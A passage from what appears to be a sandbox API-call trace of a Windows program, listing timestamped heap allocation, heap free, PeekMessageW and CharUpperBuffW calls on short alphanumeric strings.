out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.541] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.542] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.543] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.545] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.545] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.546] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.546] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.546] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.549] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0258.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, 